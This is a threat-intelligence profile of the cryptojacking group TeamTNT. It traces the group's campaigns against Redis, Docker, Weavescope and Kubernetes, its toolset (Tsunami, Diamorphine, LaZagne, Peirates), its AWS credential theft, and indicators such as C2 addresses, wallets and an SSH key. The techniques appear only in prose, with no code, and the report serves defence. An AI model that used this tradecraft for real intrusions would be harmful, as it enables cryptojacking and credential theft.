|Category: Adversary Intelligence||Industry: IT & Technology||Region: Global||Source: A2|
- TeamTNT goes by the Twitter handle “@HildeTnT / [email protected]”
- During their attack period, the group was very active on Twitter, posting and discussing:
- Attacks conducted
- Servers compromised
- Tools employed
- The group most likely originates from Germany because:
- Most of the tweets and bash scripts are in the German language.
- The account’s location is set to Deutschland.
- Comments in the bash scripts contain words from the German language.
- The following Tweet made on the group’s official account, suggests that it is a collective of 12 individuals (or more if they hired new people in late 2020).
- TeamTNT’s Github profile contains 25 public repositories, most of which are the forks of the popular red teaming tools and other repositories possibly leveraged by them.
- The following domain was used by the group to host their malicious files and scripts while performing the attack: https://teamtnt[.]red.
- CloudSEK researchers were able to gather the following information about the domain:
- Domain was registered on 10 February 2020
- During the same time TeamTNT had begun to actively target Redis servers
- Domain is currently inactive
- Some screenshots of the domain are still available on Wayback Machine
- The group has been active since February 2020 when they launched their first campaign targeting Redis servers.
- The motive behind the attack was cryptojacking and the following tools were used:
- pnscan - An open-source parallel network scanner, used to scan the whole internet and look for the services listening on the default Redis port (port: 6379). The setup script generates the payload that is executed on the Redis servers.
- Tsunami - An open-source botnet, aslo known as titan or ziggystartux, used to perform DDoS attacks against targets or to execute commands on the infected machine.
- xmrigCC - A tool used for mining crypto.
- watchdog.c - A type of monitoring tool used in Linux for monitoring the mining process.
- Punk.py - A post-exploitation tool meant to help network pivot from a compromised Unix box. This tool collects usernames, SSH keys, as well as known hosts from a Unix systemt and then tries to connect via SSH to all the combinations found.
- In May 2020, the group started targeting Docker by employing the same Bash scripts and malware.
- The group’s primary motive remained the same, i.e cryptojacking.
- A new tool was added to their arsenal:
- masscan - A TCP port scanner used to find misconfigured Docker services by scanning exposed ports and services. Once a victim is located, using masscan and zgrab, the attacker creates a container using Alpine image and passes an argument to the script which downloads and executes other malicious scripts.
- The group continued their attacks on Docker however they started using the Ubuntu images directly instead of Alpine.
- The group started using a Linux Kernel Module (LKM) rootkit named Diamorphine to hide their activities on infected machines.
- AWS credential-stealing capabilities were added into their scripts.
- TeamTNT added started exploiting Weavescope for troubleshooting and leveraging it as a backdoor for the following:
- Gaining full access to the victim’s cloud environment
- Monitoring Docker, Kubernetes, the Distributed Cloud Operating System (DC/OS), and AWS Elastic Compute Cloud (ECS)
- Running shell commands
- The group began using two new tools to steal credentials from browser history and network connections:
- The group also began using a simple Linux ELF runtime crypter, ezuri, to encrypt their malware for evading detection.
- Lacework Labs released a report on Tsunami (the bot used by TeamTNT) mentioning the following details:
- Only 90 of the 200 connected bots were detected with unique IP addresses from the previous scripts.
- Some of the bots behind a NAT service were sharing the same external IP address.
- Majority of the affected computers were Asian cloud instances hosted primarily by Tencent, Alibaba, and AWS.
- During this period, the group stopped attacking Redis instances and started targeting Kubernetes.
- Three new tools were being employed by the group:
- Peirates - An open-source Kubernetes Penetration Testing tool
- Botb - An open-source tool for container analysis and exploitation for Kubernetes
- libprocesshider - An open-source tool that uses the ID preloader to hide a process under Linux.
- The group’s target list remained the same but they expanded their credential-stealing capabilities, to the following services and applications.
- They added the plugin of AWS CLI in their script to exfiltrate maximum information about the instance inclduing resources, instance, roles, volumes, etc.
- On 25 July 2021, TeamTNT launched a campaign named “Chimaera” where they continued their attacks on Docker, Kubernetes, and Weavescope services.
- To maintain transparency, the group created a dashboard on their website that displayed campaign statistics.
- The group significantly improved their enumeration technique by adding over 70 unique AWS CLI commands designed to enumerate the following 7 AWS services:
- IAM configuration
- EC2 instances
- S3 buckets
- Support cases
- Direct connection
- They also started employing LaZagne, another open-source application, to enhance their credential-stealing capabilities.
- Account manipulation by adding their own SSH authorized_keys on compromised servers.
- Installing a scanner to scan the entire internal network for lateral movements.
- Using process monitoring tools to restart processes.
- Using scripts to install all sorts of tools, malware, and miner.
- Packing binaries to evade normal security checks .
- Using obfuscation and encodings in bash scripts and while communicating through C2 servers.
- Using kernel-level rootkits to hide their process.
- Deploying own containers for attacks and mining.
- Using data stealing cloud service credentials.
- Resource hijacking and deploying XMRig Docker images to mine cryptocurrency.
|Tools & Exploits|
|Pnscan masscan zgrab||Ezuri UPX|
|Tsunami (IRC bot malware) xmrigCC Diamorphine Libprocesshide rathole||Punk.py LaZagne Mimipy Mimipenguin|
|Mostly they used custom scripts to pwn the services like Redis, Kubernetes Peirates Botb Docker Escape Tool (CVE-2019-5736)|
|init.sh (the second script)||5c488d9d6820f859cde5fb5d147cfe584a603152653d12e720b897df60c6f810|
|Domain / IPv4|
|C2||80.211.206[.]105 164.68.106[.]96 62.234.121[.]105|
|Hosting malicious scripts and binaries||85..214.149[.]236 45.9.148[.]108 5.9.148[.]35|
|domain/email||teamtnt[.]red chimaera[.]cc [email protected][.]red|
|Wallets||88ZrgnVZ687Wg8ipWyapjCVRWL8yFMRaBDrxtiPSwAQr Nz5ZJBRozBSJrCYffurn1Qg7Jn7WpRQSAA3C8aidaeadAn4xi4k 84dg9MjSkFvXkqHQuBr6ep6TfhR3pTP8DRyTMN5s8RgYMVRc nce7Day8edLkk3TqAaSHXu2N4W3A3XjKMaSx4X8Q3KQgZnh 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XE W2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCmAUrFd3H|
|ssh-rsa (key)||AAAAB3NzaC1yc2EAAAADAQABAAABAQDIzB9hz7bNT6qtQK CMcitaaxEB9RyJEZuumE+gUMrh6hg3ccSMg9qnAlS/Lmw5Sw wLJQXMB5WuhclPJsVawuP+pfsm1ZiGF2JnczEW5kBw1o5Fl/ 6WOV1p9MOaXHAbpi7o/5Zauu3lTktyIWuP5R9l/2pUWcFZInn aiOr1KNtCBPisNYbZ4FWAQVGwXzUWZ/ZE7SYIoOUm3EJihP PiTulegUmIzc7TzrnEn9M3U8K+LVFye+wDeSC3WNYwfjGQJA 4aFsANOiz89olh77G7IaDR8LghNfVVkRjaJ6onDZwb2CZWSiv kFsdYtL6690S407eqoes7wkJudo9Qxsn9wxNv|
- *Intelligence source and information reliability - Wikipedia
- #Traffic Light Protocol - Wikipedia
- TeamTNT Cryptomining Explosion 🧨 - Intezer
- TeamTNT Builds Botnet from Chinese Cloud Servers - Lacework
- Cetus: Cryptojacking Worm Targeting Docker Daemons
- Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials